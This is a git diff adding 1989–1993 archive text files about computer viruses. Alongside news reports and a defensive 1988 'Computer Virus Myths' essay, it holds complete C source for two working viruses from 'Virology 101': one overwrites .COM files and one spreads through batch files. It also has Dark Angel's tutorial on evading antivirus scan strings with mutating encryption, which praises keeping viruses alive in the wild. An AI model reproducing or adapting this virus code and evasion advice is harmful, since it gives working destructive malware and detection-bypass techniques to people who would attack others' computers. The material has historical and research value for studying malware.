+unnoticed in the computer until Oct. 13 and then activates when the user turns +on the machine. Appending itself to .COM (command) files, the virus will +apparently reformats track 0 of the hard disk. + The Post notes that the federal government views viruses as a grave threat to +the nation's information systems and has set in motion special programs to guard +computers against them and to punish those who introduce them. + Centel Federal Systems in Reston, Va., a subsidiary of Centel Corp. of +Chicago, is taking the threat seriously, operating a toll-free hotline staff by +six full-time staff members. More than 1,000 calls have already been received. + Tom Patterson, senior analyst for Centel's security operations, began working +on the virus five weeks ago after receiving a tip from an acquaintance in +Europe. He said he has dissected a version of it and found it can penetrate a +number of software products designed to keep viruses out. + Patterson told The Post that he found the virus on one of the machines of a +Centel client. "The virus is out there. It's real," he said. + Of course, where there's trouble, there's also a way to make money. "The more +panicked people get," said Jude Franklin, general manager of Planning Research +Corp.'s technology division, "the more people who have solutions are going to +make money." + For $25 Centel is selling software that searches for the virus. Patterson +said, however, the company is losing money on the product and that the fee only +covers the cost of the disk, shipping and handling. "I'm not trying to hype +this," he said. "I'm working 20-hour days to get the word out." + -- Cathryn Conroy + + + +SICK SOFTWARE INFECTS 100 HOSPITALS NATIONWIDE + + (Sept. 20) + When a hospital bookkeeping computer program could not figure out yesterday's +date, some 100 hospitals around the country were forced to abandon their +computers and turn to pen and paper for major bookkeeping and patient admissions +functions, reports The Washington Post. + Although there was no permanent loss of data or threat to treatment of +patients, the hospital accounting departments found themselves at the mercy of a +software bug that caused major disruptions in the usual methods of doing +business. + The incident affected hospitals using a program provided by Shared Medical +Systems Corp. of Pennsylvania. The firm stores and processes information for +hospitals on its own mainframe computers and provides software that is used on +IBM Corp. equipment. + According to The Post, the program allows hospitals to automate the ordering +and reporting of laboratory tests, but a glitch in the software would not +recognize the date Sept. 19, 1989 and "went into a loop" refusing to function +properly, explained A. Scott Holmes, spokesman for Shared Medical Systems. + The firm dubbed the bug a "birth defect" as opposed to a "virus," since it was +an accidental fault put into the program in its early days that later threatened +the system's health. + At the affected hospitals around the country, patients were admitted with pen +and paper applications. Hospital administrators admitted the process was slower +and caused some delay in admissions, but patient care was never compromised. + -- Cathryn Conroy + + +ARMY TO BEGIN VIRUS RESEARCH + + (Sept. 21) + Viruses seem to be on the mind of virtually every department administrator in +the federal government, and the US Army is no exception. The Department of the +Army says it will begin funding for basic research to safeguard against the +presence of computer viruses in computerized weapons systems. + The Army says it will fund three primary areas of research: computer security, +virus detection and the development of anti-viral products. Research awards will +be made to US businesses who are eligible to participate in the Small Business +Innovation Research (SBIR) program. + The Army program, scheduled to begin in fiscal year 1990, is at least +partially the result of Congressional pressure. For some months, Congressional +staffers have been soliciting comments about viruses and their potential effect +on the readiness of the US defense computers. + Small businesses who would like to bid on the viral research project may +obtain a copy of Program Solicitation 90.1 from the Defense Technical +Information Center at 800/368-5211. + --James Moran + + + +SO-CALLED "DATACRIME" VIRUS REPORTED ON DANISH POSTGIRO NET + + (Sept. 22) + The so-called "Datacrime" virus, said to be aimed at MS-DOS system next month, +reportedly has turned up on the Danish Postgiro network, a system of 260 +personal computers described as the largest such network in Scandinavia. + Computergram International, the British newsletter that first reported the +existence of the Datacrime virus back in July, says, ""Twenty specialists are +now having to check 200,000 floppy disks to make sure that they are free from +the virus." + Datacrime is said to attach itself to the MS-DOS .COM files and reformats +track zero of the hard disk, effectively erasing it. However, as reported, some +experts are saying the threat of the virus is absurdly overblown, that there +have been fewer than 10 verified sightings of the virus in a country with tens +of millions of computers. + --Charles Bowen + + + +IBM RELEASING ANTI-VIRUS SOFTWARE + + (Oct. 4) + In a rare move, IBM says it is releasing a program to check for personal +computer viruses in response, in part, to customer worries about a possible +attack next week from the so-called "Datacrime" virus. + "Up until the recent press hype, our customers had not expressed any +tremendous interest (in viruses) over and above what we already do in terms of +security products and awareness," Art Gilbert, IBM's manager of secure systems +industry support, told business writer Peter Coy of The Associated Press. + However, reports of a "Datacrime" virus, rumored to be set to strike MS-DOS +systems, have caused what Coy describes as "widespread alarm," even as many +experts say the virus is rare and a relatively small number of PCs are likely to +be harmed. + IBM says it is releasing its Virus Scanning Program for MS-DOS systems that +can spot three strains of the Datacrime virus as well as more common viruses +that go by names such as the Jerusalem, Lehigh, Bouncing Ball, Cascade and +Brain. + The $35 program is available directly from IBM or from dealers, marketing +representatives and remarketers and, according to Gilbert, will detect but not +eradicate viruses. Gilbert added that installing a virus checker is not a +substitute for safe-computing practices such as making backup copies of programs +and data and being cautious about software of unknown origin. + Meanwhile, virus experts speaking with Coy generally praised IBM's actions. + "It's about time one of the big boys realized what a problem this is and did +something about it," said Ross Greenberg, a New York consultant and author of +Flu-Shot Plus. "To date, all the anti-virus activity is being done by the mom +and pops out there." + In addition, Pamela Kane, president of Panda Systems in Wilmington, Del., and +author of a new book, "Virus Protection," called the move "a very important and +responsible step." + As noted, experts are differing widely over whether there is truly a threat +from the Datacrime virus. The alleged virus -- also dubbed The Columbus Day +virus, because it reportedly is timed to begin working on and after Oct. 12 -- +supposedly cripples MS-DOS- based hard disks by wiping out the directory's +partition table and file allocation table. + Besides the IBM virus scanning software, a number of public domain and +shareware efforts have been contributed online, collected on CompuServe by the +IBM Systems/Utilities Forum (GO IBMSYS). For more details, visit the forum, see +Library 0 and BROwse files with the keyword of VIRUS (as in BRO/KEY:VIRUS). + --Charles Bowen + + + +DUTCH COMPUTERISTS FEAR 'DATACRIME' VIRUS + + (Oct. 7) + The "Datacrime"/Columbus Day virus, which is being widely down-played in the +US, may be much more common in the Netherlands. A Dutch newspaper reported this +week the virus had spread to 10 percent of the personal computers there. + "Those figures are possibly inflated," police spokesman Rob Brons of the Hague +told The Associated Press. Nonetheless, police are doing brisk business with an +antidote to fight the alleged virus. Brons said his department has sold +"hundreds" of $2.35 floppy disks with a program that purportedly detects and +destroys the virus. + As reported, Datacrime has been described as a virus set to destroy data in +MS-DOS systems on or after Oct. 12. AP notes that in the US there have been +fewer than a dozen confirmed sightings of the dormant virus by experts who +disassembled it. + The wire service also quotes Joe Hirst, a British expert on viruses, as saying +some now believe the virus was created by an unidentified Austrian computerist. +He added that as far as he knew the Netherlands was the only European country in +which the virus had been spotted. + --Charles Bowen + \ No newline at end of file diff --git a/textfiles.com/virus/cvirs.101 b/textfiles.com/virus/cvirs.101 new file mode 100644 index 00000000..3279a6f0 --- /dev/null +++ b/textfiles.com/virus/cvirs.101 @@ -0,0 +1,250 @@ + Upper-level languages, such as Basic, C, and a multitude of + others, are where most programmers these days feel at home. They + provide users with an amazing amount of built-in functionality, + and allow the programmer to escape from having to deal with the + machine that is being programmed on, and instead focus on the + details of the program design. For viruses, this makes them easy + languages to start in, but there are several obstacles. The first + is that most upper-level languages simply were not made to program + at a base systems level, even in C this is not easy. As a result, + most viruses that are in this genre are primitive [usually + overwriting] in their reproduction mechanism, although their + activation routines can be impressive. Another really important + disadvantage is that high-level languages often create files that + are at the very LEAST 10k and often much higher - not very + efficient for a virus. With this overhead, a memory-resident + virus is impractical as it would usually be noticed by the user + when a rather large chunk of memory disappears for no apparent + reason. + + Another possibility with high-level languages, however, is a + source-code virus. This kind of virus is quite rare (to the best + of my knowledge) but could be very effective. What a source-code + virus does, in short, is search for another source file in the + same language - for example, it might search for all files with a + ".C" extension for C. It would then add its own source code to + the file (often by way of "including" a header with the routines + and placing a call to it in main()) which would execute once the + program was compiled. After compilation, the virus would be more + or less hidden inside the application, and would be dormant until + it found another ".C" file. The only documented case of this that + I know of is Mark Ludwig's virus presented in Computer Virus + Developments Quarterly, Volume 1, Number 2. + + At any rate, all of these viruses have some basic steps in + common. They are: + + 1) Find a file to infect, be it an executable, source, + or whatever (If none found, go to step 3) + 2) Place virus in file. + 3) Decide if any activation routines are met and, if so, + activate. + 4) Return to host or terminate and return to DOS. + + For overwriting viruses, the implementation of these is quite + simple. The only problem with these viruses is that they totally + destroy any program that they infect, making them quite obvious. + The only way to cure these is to find all of the infected files + and delete them, restoring them from backups. The following virus + is an extremely simple overwriting virus written in C. It will + infect all .COM files within the current directory, destroying + them completely. As it infects each file, it will print + "Infecting [FILENAME]" on the screen as a warning. If you compile + it to test it, compile it once, then EXE2BIN it and check the + resultant size. If it does not equal 9504 bytes, change the line + "x=9054;" to the appropriate size value. Do be careful with this + virus, because while it is a primitive one, it will destroy any + .COM files that it hits. + + - - ------ Cut Here ------ - - + /* This is a simple overwriting virus programmed in Turbo C */ + /* It will infect all .COM files in the current directory */ + /* Infections destroy the programs and cannot be cured */ + /* It was presented in Virology 101 (c) 1993 Black Wolf */ + /* FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE! */ + + #include + #include + #include + + FILE *Virus,*Host; + int x,y,done; + char buff[256]; + struct ffblk ffblk; + + main() + { + done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */ + while (!done) /* Loop for all COM's in DIR*/ + { + printf("Infecting %s\n", ffblk.ff_name); /* Inform user */ + Virus=fopen(_argv[0],"rb"); /* Open infected file */ + Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */ + + x=9504; /* Virus size - must */ + /* be correct for the */ + /* compiler it is made */ + /* on, otherwise the */ + /* entire virus may not*/ + /* be copied!! */ + while (x>256) /* OVERWRITE new Host */ + { /* Read/Write 256 byte */ + fread(buff,256,1,Virus); /* chunks until bytes */ + fwrite(buff,256,1,Host); /* left < 256 */ + x-=256; + } + fread(buff,x,1,Virus); /* Finish off copy */ + fwrite(buff,x,1,Host); + fcloseall(); /* Close both files and*/ + done = findnext(&ffblk); /* go for another one. */ + } + /* Activation would go */ + /* here */ + return (0); /* Terminate */ + } + - - ------ Cut Here ------ - - + + The next virus to be presented is also in C, but is quite a + bit different in functioning than the last. Instead of infecting + executable files by overwriting them, it infects .BAT files by + the directory. When executed, BAT&COM will first search one + directory below the current for batch files. If none are found, + it will try the root directory, then finally the DOS directory. + If it finds any batch files, it will infect all of the batches + in the directory, then check to see if its file has already + been put there. If not, then it will create a file called + BAT&COM containing the virus. On my setup, after EXE2BIN-ing + the file, it came out around 10k. The virus code is as follows: + + The BAT&COM Virus in C + + - - - ---Start Code---- - - - + /* This file is a high-level language virus of a different sort. + It will search out batch files and, when found, place a copy + of itself in the directory with the batch file while adding + instructions in the BAT to execute this new file. In this way, + it will spread each time an "infected" batch is run. + Disinfection is done simply by deleting all of the BAT&COM.COM + files and removing the commands from batch files that ruin + them. This one is NOT confined to the current directory, + so make sure it is on an isolated machine and be sure to + clean up any infections. PLEASE DO NOT RELEASE! + + BAT&COM virus is (C) 1993 Black Wolf Enterprises. + */ + + + #include + #include + #include + #include + + struct ffblk ffblk; + main() + { + char old_dir[MAXPATH]; + Get_Path(old_dir); /* Save the old directory */ + Pick_A_Dir(); /* Find a new directory to */ + Infect_Directory(); /* infect and infect it. */ + chdir(old_dir); /* Return to old directory */ + return 0; + } + + + + Pick_A_Dir() + { + int done; + chdir(".."); /* First, Go out a DIR. */ + done=findfirst("*.BAT",&ffblk,0); /* If no BAT files, try */ + /* root and DOS */ + if (done) + { + chdir("\\"); + done=findfirst("*.BAT",&ffblk,0); + if (done) chdir("\\DOS\\"); + } + return 0; + } + + + Infect_Directory() + { + int done; + + done = findfirst("*.BAT",&ffblk,0); + while (!done) /* Find all .BAT files */ + { /* and add code to run */ + Do_Batch(); /* BAT&COM if not */ + done = findnext(&ffblk); /* already there */ + } + + if (findfirst("BAT&COM.COM",&ffblk,0)) /* If BAT&COM does */ + {Copy_Virus();} /* not exist, then */ + return 0; /* copy it into dir.*/ + } + + + + Do_Batch() + { + FILE *batch; + char Infection_Buffer[12]; + char vpath[MAXPATH]; + + Get_Path(vpath); /* Get path for adding path */ + /* specifier in commands */ + + + if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */ + + batch=fopen(ffblk.ff_name, "rt+"); + fseek(batch, -11, SEEK_END); + fread(Infection_Buffer,11,1,batch); + Infection_Buffer[11]=0; /* Terminate String */ + + if (strcmp(Infection_Buffer,"BAT&COM.COM")) /* Check if */ + { /* Batch is */ + fseek(batch, 0, SEEK_END); /* infected.*/ + fprintf(batch,"\n%s\\BAT&COM.COM",vpath); + } /*^- Add command */ + /* to batch */ + + fclose(batch); + return 0; + } + + + Copy_Virus() + { + FILE *old_virus, *new_virus; + int write_length; + char copy_buffer[1024]; /* Copy the virus to */ + /* new directory */ + old_virus=fopen(_argv[0],"rb"); + new_virus=fopen("BAT&COM.COM","wb"); + + write_length=1024; + + while (write_length==1024) + { + write_length=fread(copy_buffer,1,1024,old_virus); + fwrite(copy_buffer,write_length,1,new_virus); + } + fclose(old_virus); + fclose(new_virus); + return 0; + } + + + Get_Path(char *path) + { + strcpy(path, "A:\\"); + path[0] ='A' + getdisk(); /* Returns current path */ + getcurdir(0, path+3); + return 0; + } + - - - ---End of Code---- - - - + + + \ No newline at end of file diff --git a/textfiles.com/virus/cvm.txt b/textfiles.com/virus/cvm.txt new file mode 100644 index 00000000..0bbec1a9 --- /dev/null +++ b/textfiles.com/virus/cvm.txt @@ -0,0 +1,449 @@ + + + + + + + Computer Virus Myths + + by Rob Rosenberger + with Ross Greenberg + + + A number of myths have popped up recently about the threat + of computer "viruses". There are myths about how widespread they + are, how dangerous they are, and even myths about what a computer + virus really is. We'd like the facts to be known. + + The first thing you have to understand is that a virus is a + programming technique that falls in the realm of "Trojan horses." + All viruses are Trojan horses, but very few Trojan horses can be + called a virus. + + That having been said, it's time to go over the terminology + we use when we lecture: + + BBS Bulletin Board System. If you have a modem, you + can call a BBS and leave messages, transfer com- + puter files back & forth, and learn a lot about + computers. (What you're reading right now most + likely came to you from a BBS, for example.) + + Bug an accidental flaw in the logic of a computer + program that makes it do things it shouldn't + really be doing. Programmers don't mean to put + bugs in their program, but they always creep in. + The first bug was discovered by pioneer Grace + Hopper when she found a dead moth shorting out a + circuit in the early days of computers. Pro- + grammers tend to spend more time debugging their + programs than they do writing them in the first + place. + + Hacker someone who really loves computers and who wants + to push them to the limit. Hackers don't release + Trojan horses onto the world, it's the wormers who + do that. (See the definition for a "wormer".) + Hackers have a healthy sense of curiosity: they + try doorknobs just to see if they're locked, and + they tinker with a piece of equipment until it's + "just right." + + Shareware a distribution method for quality software avail- + able on a "try before you buy" basis. You pay for + the program only if you find it useful. Shareware + programs can be downloaded from BBSs and you are + encouraged to give an evaluation copy to friends. + There are few advertising & distribution costs, so + many shareware applications can rival the power of + off-the-shelf counterparts, at just a fraction of + the price. + + + + Copyright (c) 1988 Rob Rosenberger & Ross Greenberg Page 1 + + + + + + + Trojan horse a generic term describing a set of computer + instructions purposely hidden inside a program. + Trojan horses tell a program to do things you + don't expect it to do. The term comes from a + historic battle in which the ancient city of Troy + was offered the "gift" of a large wooden horse + that secretly held soldiers in its belly. The + Trojans rolled it into their fortified city.... + + Virus a term for a very specialized Trojan horse that + can spread to other computers by secretly + "infecting" programs with a copy of itself. A + virus is the only type of Trojan horse which is + contagious, like the common cold. If it doesn't + meet this definition, then it isn't a virus. + + Worm a term similar to a Trojan horse, but there is no + "gift" involved. If the Trojans had left that + wooden horse outside the city, they wouldn't have + been attacked -- but worms can bypass your + defenses. An example is an unauthorized program + designed to spread itself by exploiting a bug in a + network software package. (Such programs could + possibly also contain a virus that activates when + it reaches the computer.) Worms are usually + released by someone who has normal access to the + computer or network. + + Wormers the name given to the people who unleash + destructive Trojan horses. Let's face it, these + people aren't angels. What they do hurts us. + They deserve our disrespect. + + Viruses, like all Trojan horses, are purposely designed to + make a program do things you don't expect it to do. Some viruses + are just an annoyance, perhaps only displaying a "Peace on earth" + message. The viruses we're worried about are the ones designed + to destroy your files and waste the valuable time you'll spend to + repair the damage. + + Now you know the difference between a virus and a Trojan + horse and a bug. Let's get into some of the myths: + + All purposely destructive code comes as a virus. + Wrong. Remember, "Trojan horse" is the general term for + purposely destructive code. Very few Trojan horses are actually + viruses. + + All Trojan horses are bad. + Believe it or not, there are a few useful Trojan horse tech- + niques in the world. A "side door" is any command not documented + in the user manual, and it's a Trojan horse by definition. Some + programmers install side doors to help them locate bugs in their + + + + + Computer Virus Myths Page 2 + + + + + + + programs. Sometimes a command may have such an obscure function + that it makes sense not to document it. + + Viruses and Trojan horses are a recent phenomenon. + Trojan horses have been around since the first days of the + computer. Hackers toyed with viruses in the early 1960s as a + form of amusement. Many different Trojan horse techniques were + developed over the years to embezzle money, destroy data, etc. + The general public wasn't aware of this problem until the IBM PC + revolution brought it into the spotlight. Just five years ago, + banks were still covering up computerized embezzlements because + they believed they'd lose too many customers. + + Computer viruses are reaching epidemic proportions. + Wrong again. Viruses may be spread all over the planet but + they aren't taking over the world. There are only about fifty or + so known virus "strains" at this time and a few of them have been + completely eliminated. Your chances of being infected are slim + if you take proper precautions. (Yes, it's still safe to turn on + your computer!) + + Viruses could destroy all the files on my disks. + Yes, and a spilled cup of coffee will do the same thing. If + you have adequate backup copies of your data, you will be able to + recover from a virus/coffee attack. Backups mean the difference + between a nuisance and a disaster. + + Viruses have been documented on over 300,000 computers. + This statistic comes from John McAfee, a self-styled virus + fighter who seems to come up with all the quotes the media love + to hear. We assume it includes every floppy disk ever infected + by a virus, as well as all of the computers participating in the + Christmas worm attack. (That worm was designed for a particular + IBM network software package; it never infected the computers. + Therefore, it wasn't a virus. The Christmas worm attack can't be + included in virus infection statistics.) Most of the media don't + understand computer crimes, so they tend to call almost anything + a virus. + + Viruses can be hidden inside a data file. + Data files can't wreak havoc on your computer -- only an + executable program can do that. If a virus were to infect a data + file, it would be a wasted effort. + + Most BBSs are infected with viruses. + Here's another scary myth drummed up in the big virus panic. + Very few BBSs are really infected. (If they are infected, they + won't be around for long!) It's possible a dangerous file could + be available on a BBS, but that doesn't mean the BBS itself is + infected. + + + + + + + + Computer Virus Myths Page 3 + + + + + + + BBSs and shareware programs spread viruses. + "The truth," says PC Magazine publisher Bill Machrone, "is + that all major viruses to date were transmitted by commercial + packages and private mail systems, often in universities." The + Peace virus, for example, made its way into a commercial software + product sold to thousands of customers. Machrone goes on to say + that "bulletin boards and shareware authors work extraordinarily + hard at policing themselves to keep viruses out." Many reputable + sysops check all new files for Trojan horses; nationwide sysop + networks help spread the word about dangerous files. You should + be careful about software that comes from friends & BBSs, that's + definitely true -- but you must also be careful with the software + you buy at computer stores. The Peace virus proves it. + + My computer could be infected if I call an infected BBS. + BBSs can't write information on your disks -- that's handled + by the communications software you use. You can only transfer a + dangerous file if you let your software do it. (In rare cases, a + computer hooked into a network could be sent a dangerous file or + directly infected, but it takes specialized software to connect a + computer into a network. BBSs are NOT networks.) + + My files are damaged, so it must have been a virus attack. + It could also have been caused by a power flux, or static + electricity, or a fingerprint on a floppy disk, or a bug in your + software, or perhaps a simple error on your part. Power failures + and spilled cups of coffee have destroyed more data than all the + viruses combined. + + Donald Burleson was convicted of releasing a virus. + A recent Texas computer crime trial was hailed all over the + country as a "virus" trial. Donald Burleson was in a position to + release a complex, destructive worm on his employer's mainframe + computer. This particular worm wasn't able to spread itself to + other computers, so it wasn't a virus. The prosecuting attorney, + Davis McCown, claims he "never brought up the word virus" during + the trial. So why did the media call it a virus? + 1. David Kinney, an expert witness testifying for the defense + (oddly enough), claimed he believed Burleson unleashed a + virus. This is despite the fact that the programs in + question had no capability to infect other systems. The + prosecuting attorney didn't argue the point and we don't + blame him -- Kinney's bizarre claim on the witness stand + probably helped sway the jury to convict Burleson, and it + was the defense's fault for letting him testify. + 2. McCown doesn't offer reporters a definition for the word + virus. He gives the facts behind the case and lets the + reporters deal with the definitions. The Associated Press + and USA Today, among others, used such vague terms that + any program could be called a virus. If we applied their + definitions in the medical world, we could safely claim + penicillin is a biological virus (which is absurd). + + + + + + Computer Virus Myths Page 4 + + + + + + + 3. McCown claims many of the quotes attributed to him "are + misleading or fabricated" and identified one in particular + which "is total fiction." Reporters occasionally print a + quote out of context, and McCown apparently fell victim to + it. (It's possible a few bizarre quotes from David Kinney + or John McAfee were accidentally attributed to McCown.) + + Robert Morris Jr. released a benign virus on a defense network. + It may have been benign, but it wasn't a virus in the strict + technical sense. Morris, the son of a chief scientist for the + National Security Agency, allegedly became bored and decided to + take advantage of a tiny bug in the Defense Department's network + software. (We say "alleged" because Morris hadn't been charged + with a crime when we went to press.) That tiny bug let him send + a worm through the network and have it execute when it reached + certain computers. Among other things, Morris's "Internet" worm + was able to tell some computers to send copies of itself to other + computers in the network. The network became clogged in a matter + of hours. The media called the Internet worm a "virus" (like it + called the Christmas worm a virus) because it was able to spread + itself to other computers. But it didn't infect those computers, + so it can't be called a virus. (We can't really fault the press + for calling it one, though. It escapes the definition of a virus + because of a technicality.) A few notes: + 1. This worm worked only on Sun-3 & Vax computers with a UNIX + operating system that was linked to the Internet network; + 2. The 6,200 affected computers should not be counted in any + virus infection statistics (they weren't infected); + 3. Yes, Morris could easily have added some infection code to + make it a worm/virus if he'd had the urge; and, + 4. The network bug Morris exploited has since been fixed. + + Viruses can spread to all sorts of computers. + All Trojan horses are limited to a family of computers, and + this is especially true for viruses. A virus designed to spread + on IBM PCs cannot infect an IBM 4300-series mainframe, nor can it + infect a Commodore C64, nor can it infect an Apple MacIntosh. + + My backup disks will be destroyed if I back up a virus. + No, they won't. Let's suppose a virus does get backed up + with your other files. Backups are just a form of data, and data + can't harm your system. You can recover the important files from + your backups without triggering the virus. + + Anti-virus software will protect me from viruses. + Anti-virus packages offer some good front-line protection, + but they can be tricky to use at times. You could make a crucial + mistake in deciding whether to let a "flagged" event take place. + Also, Trojan horses can be designed to take advantage of holes in + your defense. + + + + + + + + Computer Virus Myths Page 5 + + + + + + + Copy-protected software is safe from an attack. + This is totally wrong. Copy-protected software is the most + vulnerable software in a Trojan horse attack. You may have big + problems trying to use or re-install such software, especially if + the master disk was attacked. It should also be noted that copy- + protection schemes rely on extremely tricky techniques which have + occasionally "blown up" on users. Some people mistakenly believe + they were attacked by a clever virus. + + Viruses are written by hackers. + Yes, hackers have written viruses -- just to see how they + operate. But they DON'T unleash them to an unsuspecting public. + Wormers are the ones who do that. (You can think of a wormer as + a hacker who was seduced by the Dark Side of The Force.) Hackers + got a bum rap when the press corrupted the name. + + + We hope this dispels the myths surrounding the virus scare. + Viruses DO exist, many of them will cause damage, and all of them + can spread to other computers. But you can defend yourself from + an attack if you keep a cool head and a set of backups. + + The following guidelines can shield you from Trojan horses + and viruses. They will lower your chances of being attacked and + raise your chances of recovering from one. + + 1. Download files only from reputable BBSs where sysops check + every program for Trojan horses. If you're still afraid, + consider getting your programs from a BBS or "disk vendor" + company which gets its programs directly from the author; + + 2. Let a newly uploaded file "mature" on a BBS for one or two + weeks before you download it (others will put it through + its paces). + + 3. Set up a procedure to regularly back up your files, and + follow it religiously. Consider purchasing a user- + friendly backup program that takes the drudgery out of + backing up your files. + + 4. Rotate between two sets of backups for better security + (use set #1, then set #2, then set #1...). + + 5. Consider using a program which will create a unique + "signature" of all the programs on your computer. Once in + a while, you can run this program to determine if any of + your applications have been modified -- either by a virus + or by a stray gamma ray. + + 6. If your computer starts acting weird, DON'T PANIC. It may + be a virus, but then again it may not. Immediately reboot + from a legitimate copy of your master DOS disk. Put a + write-protect tab on that disk just to be safe. Do NOT + run any programs on your regular disks (you might activate + + + + Computer Virus Myths Page 6 + + + + + + + a Trojan horse). If you don't have adequate backups, try + to bring them up to date. Yes, you might be backing up a + virus as well, but it can't hurt you as long as you don't + run any of your normal programs. Set your backups off to + the side. Only then can you safely hunt for the problem. + + 7. If you can't figure out what's wrong with your computer, + and you aren't sure of yourself, just turn it off and call + for help. Consider calling a local computer group before + you hire an expert to fix your problem. If you need a + professional, consider hiring a regular computer consul- + tant before you call on a "virus expert." + + 8. If you can't figure out what's wrong with your computer, + and you are sure of yourself, execute a low-level format + on all of your regular disks (you can learn how to do it + from almost any BBS), then do a high-level format on each + one of them. Next, carefully re-install your software + from legitimate copies of the master disks, not from the + backups. Then, carefully restore only the data files (not + the executable program files!) from your backup disks. + + If you DO find a Trojan horse or a virus, we'd appreciate it + if you'd mail a copy to us. (But please, don't handle one unless + you know what you're doing.) Include as much information as you + can, and put a label on the disk that says it contains a Trojan + horse or virus. Send it to Ross Greenberg, 594 Third Avenue, New + York, NY 10016. Thank you. + + ------------------------------------------------------- + Ross Greenberg is the author of a popular Trojan/virus + detection program. Rob Rosenberger is the author of a + modem analysis program. These men have never met in + person; they worked on this story completely by modem. + ------------------------------------------------------- + + Copyright (c) 1988 Rob Rosenberger & Ross Greenberg + + + You may give copies of this to anyone if you pass it along in its + entirety. Publications must obtain written permission to reprint + this article. Write to Rob Rosenberger, P.O. Box #643, O'Fallon, + IL 62269. + + + + + + + + + + + + + + + Computer Virus Myths Page 7 +  \ No newline at end of file diff --git a/textfiles.com/virus/datut001.txt b/textfiles.com/virus/datut001.txt new file mode 100644 index 00000000..9a6e5991 --- /dev/null +++ b/textfiles.com/virus/datut001.txt @@ -0,0 +1,145 @@ + + + SCAN STRINGS, HOW THEY WORK, + AND HOW TO AVOID THEM + + By Dark Angel + + + Scan strings are the scourge of the virus author and the friend of anti- + virus wanna-bes. The virus author must find encryption techniques which + can successfully evade easy detection. This article will show you several + such techniques. + + Scan strings, as you are well aware, are a collection of bytes which an + anti-viral product uses to identify a virus. The important thing to keep + in mind is that these scan strings represent actual code and can NEVER + contain code which could occur in a "normal" program. The trick is to use + this to your advantage. + + When a scanner checks a file for a virus, it searches for the scan string + which could be located ANYWHERE IN THE FILE. The scanner doesn't care + where it is. Thus, a file which consists solely of the scan string and + nothing else would be detected as infected by a virus. A scanner is + basically an overblown "hex searcher" looking for 1000 signatures. + Interesting, but there's not much you can do to exploit this. The only + thing you can do is to write code so generic that it could be located in + any program (by chance). Try creating a file with the following debug + script and scanning it. This demonstrates the fact that the scan string + may be located at any position in the file. + + --------------------------------------------------------------------------- + + n marauder.com + e 0100 E8 00 00 5E 81 EE 0E 01 E8 05 00 E9 + + rcx + 000C + w + q + + --------------------------------------------------------------------------- + + Although scanners normally search for decryption/encryption routines, in + Marauder's case, SCAN looks for the "setup" portion of the code, i.e. + setting up BP (to the "delta offset"), calling the decryption routine, and + finally jumping to program code. + + What you CAN do is to either minimise the scannable code or to have the + code constantly mutate into something different. The reasons are readily + apparent. + + The simplest technique is having multiple encryption engines. A virus + utilising this technique has a database of encryption/decryption engines + and uses a random one each time it infects. For example, there could be + various forms of XOR encryption or perhaps another form of mathematical + encryption. The trick is to simply replace the code for the encryption + routine each time with the new encryption routine. + + Mark Washburn used this in his V2PX series of virii. In it, he used six + different encryption/decryption algorithms, and some mutations are + impossible to detect with a mere scan string. More on those later. + + Recently, there has been talk of the so-called MTE, or mutating engine, + from Bulgaria (where else?). It utilises the multiple encryption engine + technique. Pogue Mahone used the MTE and it took McAfee several days to + find a scan string. Vesselin Bontchev, the McAfee-wanna-be of Bulgaria, + marvelled the engineering of this engine. It is distributed as an OBJ file + designed to be able to be linked into any virus. Supposedly, SCANV89 will + be able to detect any virus using the encryption engine, so it is worthless + except for those who have an academic interest in such matters (such as + virus authors). + + However, there is a serious limitation to the multiple encryption + technique, namely that scan strings may still be found. However, scan + strings must be isolated for each different encryption mechanism. An + additional benefit is the possibility that the antivirus software + developers will miss some of the encryption mechanisms so not all the + strains of the virus will be caught by the scanner. + + Now we get to a much better (and sort of obvious) method: minimising scan + code length. There are several viable techniques which may be used, but I + shall discuss but three of them. + + The one mentioned before which Mark Washburn used in V2P6 was interesting. + He first filled the space to be filled in with the encryption mechanism + with dummy one byte op-codes such as CLC, STC, etc. As you can see, the + flag manipulation op-codes were exploited. Next, he randomly placed the + parts of his encryption mechanism in parts of this buffer, i.e. the gaps + between the "real" instructions were filled in with random dummy op-codes. + In this manner, no generic scan string could be located for this encryption + mechanism of this virus. However, the disadvantage of this method is the + sheer size of the code necessary to perform the encryption. + + A second method is much simpler than this and possibly just as effective. + To minimise scan code length, all you have to do is change certain bytes at + various intervals. The best way to do this can be explained with the + following code fragment: + + mov si, 1234h ; Starting location of encryption + mov cx, 1234h ; Virus size / 2 + variable number + loop_thing: + xor word ptr cs:[si], 1234h ; Decrypt the value + add si, 2 + loop loop_thing + + In this code fragment, all the values which can be changed are set to 1234h + for the sake of clarity. Upon infection, all you have to do is to set + these variable values to whatever is appropriate for the file. For + example, mov bx, 1234h would have to be changed to have the encryption + start at the wherever the virus would be loaded into memory (huh?). Ponder + this for a few moments and all shall become clear. To substitute new + values into the code, all you have to do is something akin to: + + mov [bp+scratch+1], cx + + Where scratch is an instruction. The exact value to add to scratch depends + on the coding of the op-code. Some op-codes take their argument as the + second byte, others take the third. Regardless, it will take some + tinkering before it is perfect. In the above case, the "permanent" code is + limited to under five or six bytes. Additionally, these five or six bytes + could theoretically occur in ANY PROGRAM WHATSOEVER, so it would not be + prudent for scanners to search for these strings. However, scanners often + use scan strings with wild-card-ish scan string characters, so it is still + possible for a scan string to be found. + + The important thing to keep in mind when using this method is that it is + best for the virus to use separate encryption and decryption engines. In + this manner, shorter decryption routines may be found and thus shorter scan + strings will be needed. In any case, using separate encryption and + decryption engines increases the size of the code by at most 50 bytes. + + The last method detailed is theft of decryption engines. Several shareware + products utilise decryption engines in their programs to prevent simple + "cracks" of their products. This is, of course, not a deterrent to any + programmer worth his salt, but it is useful for virus authors. If you + combine the method above with this technique, the scan string would + identify the product as being infected with the virus, which is a) bad PR + for the company and b) unsuitable for use as a scan string. This technique + requires virtually no effort, as the decryption engine is already written + for you by some unsuspecting PD programmer. + + All the methods described are viable scan string avoidance techniques + suitable for use in any virus. After a few practice tries, scan string + avoidance should become second nature and will help tremendously in + prolonging the effective life of your virus in the wild. diff --git a/textfiles.com/virus/datut002.txt b/textfiles.com/virus/datut002.txt new file mode 100644 index 00000000..149498f3 --- /dev/null +++ b/textfiles.com/virus/datut002.txt @@ -0,0 +1,238 @@ + + + An Introduction to Nonoverwriting Virii + + By Dark Angel + + + It seems that there are quite a few virus writers out there who just sit at + 